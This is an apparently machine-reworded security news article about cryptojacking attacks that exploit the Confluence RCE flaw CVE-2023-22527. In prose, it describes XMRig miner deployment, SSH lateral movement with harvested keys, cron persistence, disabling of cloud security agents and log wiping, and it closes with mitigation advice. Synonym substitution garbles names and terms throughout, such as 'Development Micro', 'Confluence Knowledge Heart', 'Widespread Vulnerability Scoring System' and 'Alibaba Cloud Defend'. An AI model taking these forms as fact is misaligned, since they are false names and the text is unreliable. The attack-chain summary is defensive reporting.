Risk actors proceed to use a important distant code execution (RCE) Atlassian bug found in January, with new assault vectors that flip focused cloud environments into cryptomining networks.
Development Micro has uncovered two separate assaults that use the flaw — tracked as CVE-2023-22527 within the Confluence Knowledge Heart and Confluence Server — in cryptojacking assaults that drain community assets. The server is for enterprise-level deployments of Atlassian Confluence, a collaboration and documentation platform designed for groups and organizations to create, share, and collaborate on content material.
When found, the bug obtained a ten out of 10 on the Widespread Vulnerability Scoring System (CVSS), so researchers knew out of the gate that it had nice potential for exploit in assaults starting from ransomware to cyber espionage. Now, cryptojacking may be added to that listing, eight months after the flaw’s discovery and subsequent patching by Atlassian, in line with a weblog publish printed on Aug. 28 by Development Micro.
“The assaults contain risk actors that make use of strategies such because the deployment of shell scripts and XMRig miners, concentrating on of SSH endpoints, killing competing cryptomining processes, and sustaining persistence through cron jobs,” Abdelrahman Esmail, senior engineer of risk analysis for Development Micro, wrote within the publish.
Development Micro additionally found hundreds of different makes an attempt to use max-critical CVE-2023-22527 over the previous few months, and thus really useful that these utilizing the server who have not but patched their environments ought to accomplish that as rapidly as potential.
New Assault Vectors for CVE-2023-22527
By abusing CVE-2023-22527, an unauthenticated attacker can obtain template injection, primarily enabling RCE on the affected occasion.
Development Micro found three risk actors utilizing the bug for cryptojacking assaults. Nevertheless, solely two completely different assault vectors are described within the publish. The primary one exploited the flaw within the public-facing a Confluence Server software for preliminary entry to the atmosphere. Attackers then executed the XMRig miner through an ELF file payload, hijacking system assets within the course of.
The second assault vector is way more sophisticated. It used a shell script to execute miner exercise via a shell file over Safe Shell (SSH) for all accessible endpoints within the buyer atmosphere, in line with Development Micro. The attackers downloaded the shell file and ran it with bash from reminiscence, then killed all identified cryptomining processes and any course of being run from */tmp/* directories. Then, they deleted all cron jobs, including a brand new one which runs each 5 minutes to examine for command-and-control (C2) server communications.
To keep away from detection, the attackers additionally uninstalled safety companies akin to Alibaba Cloud Defend, whereas blocking the Alibaba Cloud Defend IP deal with. Earlier than the cryptojacking started later within the assault course of, the attacker additionally turned off different safety instruments current on the system.
In the meantime, the adversaries recognized the present machine’s IP deal with and gathered information on all potential customers, IP addresses, and keys, utilizing the data to focus on different distant programs through SSH to execute additional cryptomining actions, Esmail defined within the publish. As soon as that is carried out, the attacker launched automated assaults on the focused different hosts through SSH, after which maintained entry to the server via different cron jobs.
“After guaranteeing that every one cloud monitoring and safety companies are terminated or deleted, the attacker terminates the entry level course of that exploits CVE-2023-22527 and downloads the XMRig miner to start mining actions,” Esmail wrote. As soon as cryptomining begins, the attackers attacker then eliminated all traces of their exercise by clearing log and bash historical past.
Additional Mitigations Towards Atlassian Confluence Assaults
Staying on prime of bug patching for software program, working programs, and purposes is the simplest option to stop such vulnerabilities from being exploited, however Development Micro additionally made different strategies for directors of cloud environments. These embody working towards community segmentation, which may cut back the affect of exploit-based assaults, and that organizations ought to conduct common safety audits and vulnerability assessments to assist uncover and deal with weaknesses in infrastructure earlier than exploit happens. Past that, organizations ought to have a strong incident response plan in place to make sure a swift and efficient response in case of compromise.
